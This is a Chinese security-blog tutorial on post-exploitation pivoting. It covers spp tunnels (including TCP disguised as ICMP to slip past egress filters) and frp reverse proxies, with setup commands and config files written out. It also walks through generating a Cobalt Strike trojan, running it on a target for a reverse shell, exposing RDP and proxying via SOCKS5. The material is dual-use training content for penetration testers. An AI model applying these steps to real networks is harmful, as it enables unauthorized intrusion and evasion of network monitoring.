freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术
rumilc 2024-06-02 20:35:54 263844

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透

内网穿透:解决网络控制上线&网络通讯问题 
隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网) 
代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)

spp隧道代理工具

支持的协议:
TCP、UDP、RUDP(可靠 UDP)、RICMP(可靠 ICMP)、RHTTP(可靠 HTTP)、KCP、Quic
支持类型:
正向代理、反向代理、SOCKS5正向代理、SOCKS5反向代理
协议和类型可以自由组合
外部代理协议和内部转发协议可以自由组合

spp工作原理图

spp详解以及下载地址:
https://github.com/esrrhs/spp/tree/0.6

image-20240529205935044

cs上线主机

spp代理通信

本工具使用简单,服务器、客户机各一条命令,就可建立连接。

服务端配置
chmod +x spp  ##添加执行权限
./spp -type server -proto tcp -listen :8888 ##启动spp,并设置为服务端,通信协议为tcp,监控本地的8888端口。

image-20240529211518533

客户端配置
chmod +x spp  ##添加执行权限
./spp -name "sx" -type reverse_proxy_client -server 服务器ip地址:8888 -fromaddr :7777 -toaddr :6666 -proxyproto tcp   ## 设置一个名字(自定义即可),连接服务器的IP地址及端口,将服务器的端口7777映射到本地的端口6666上,设置通信协议为tcp。

image-20240529212247397

服务端可进行查看连接状态

image-20240529212536488

CS配置

CS需要设置两个监听器,一个用于生成木马,一个用于接收反弹shell。

设置CS生成木马的监听器

此监听器IP地址要设置为服务端的IP地址,端口为刚才设置的7777端口,相当于木马执行后,会去访问服务端的7777端,而之前的设置就是将服务端的7777端口信息转发到本地6666端口。

image-20240529213231703

配置CS监听上线的监听器

接受上线主机的监听器(shell)。

image-20240529213337949

生成木马

image-20240529213525160

将木马上传到目标主机当中,执行即可。

image-20240529213619046

成功上线

image-20240529213851077

image-20240529214357108

spp服务端代理状态:

image-20240529214020706

spp隧道搭建

若目标主机的出网TCP被禁止,但是ICMP协议是能够通信的,所以通过SPP将目标主机上的TCP流量伪装为ICMP协议转发给服务端。

服务端配置

这里设置监听的是icmp协议。

./spp -type server -proto ricmp -listen 0.0.0.0  ##这里设置监听ICMP协议,全端口

image-20240529214808484

客户端配置

客户端配置需要在目标主机上进行执行此命令,将本地的TCP伪装为ICMP所以需要转发本地的端口。

spp -name "sx" -type proxy_client -server 服务器IP -fromaddr :7777 -toaddr :6666 -proxyproto tcp -proto ricmp

image-20240602190712858

服务端状态,成功建立隧道

image-20240530191945279

CS配置

CS需要设置两个监听器,一个用于生成木马,一个用于接收反弹shell。

这生成本地的7777端口,因为客户端上已经设置了将7777端口转发了。

image-20240529221856082

生成另一个监听器,监听本地的IP地址的6666端口即可。

image-20240530192149453

监听器状态:

image-20240530192230323

生成木马,执行上线。

选择本地监听器,生成木马即可。

image-20240602190742759

将木马上传到目标机器,执行木马

image-20240530192807213

执行木马,成功上线

image-20240530192444768

spp客户端状态。并抓取流量分析,为icmp流量,伪装成功。

image-20240530192913290

ICMP流量

image-20240530194309039

spp隧道代理工具还可以伪装其他协议,具体详解见spp代理

frp内网穿透

frp 是一种快速反向代理,允许您将位于 NAT 或防火墙后面的本地服务器公开给Internet。它目前支持 TCPUDP,以及 HTTPHTTPS协议,支持通过域名将请求转发到内部服务。frp 还提供 P2P 连接模式。

项目地址:fatedier/frp

对应下载即可

image-20240602192523847

内网穿透上线

frp配置

服务端配置,修改frps.ini配置文件,简单配置

image-20240602192727135

客户端配置

[common]
server_addr = 服务器ip
server_port = 8080	#连接端口

[nwct]
type = tcp
local_ip = 127.0.0.1
local_port = 9999
remote_port = 8888

image-20240602194819390

服务端开启。客户端开启。观察状态,成功建立连接。

客户端开启,向服务器建立连接。

image-20240602194850298

服务端状态,成功建立连接。

image-20240602194926511

CS上线

客户端开启CS,配置监听器。需要两个监听器,一个生成木马,一个监听反弹shell。

生成木马的监听器配置:

image-20240602195030145

接受shell的监听器配置:

image-20240602202151483

生成木马,上传到目标机器当中,执行,成功上线

image-20240602202216995

上传到目标机,并执行木马

image-20240602195309111

成功上线

image-20240602195355801

配置RDP远程桌面连接内网主机

服务端简单配置不变,开启frp服务

image-20240602200039136

客户端在目标机上执行,配置文件修改

[common]
server_addr = 服务器ip
server_port = 8080

[RDP]
type = tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port = 5555

image-20240602200604485

开启客户端服务,服务端查看状态,成功建立连接

image-20240602200619109

服务端状态

image-20240602200452644

远程桌面连接:

image-20240602200929920

成功连接

image-20240602200805779

socks5代理转发

通过代理转发,实现访问内网web服务

客户端配置:

[socks5]                
type = tcp              
remote_port = 8081
plugin = socks5

image-20240602201205354

客户端执行即可

image-20240602201230346

服务端状态:

image-20240602201254773

通过代理软件或浏览器代理插件配置代理,可访问内网服务

image-20240602201508017

访问内网web服务

image-20240602201728676

文章不妥之处,欢迎批评指正!

# 渗透测试 # 网络安全 # 网络安全技术
本文为 rumilc 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
内网安全
rumilc LV.5
喜欢网络安全,热爱探索前沿技术! 答案交给时间寻觅,未来不负时光所期! CSDN:https://blog.csdn.net/rumil
  • 27 文章数
  • 38 关注者
内网安全-隧道搭建&穿透上线&内网渗透-Linux上线-cs上线Linux主机
2024-05-28
VulnHub靶机 DC-9打靶 渗透详细流程
2024-04-27
VulnHub靶机 DC-8 打靶 详细渗透过程
2024-04-27
文章目录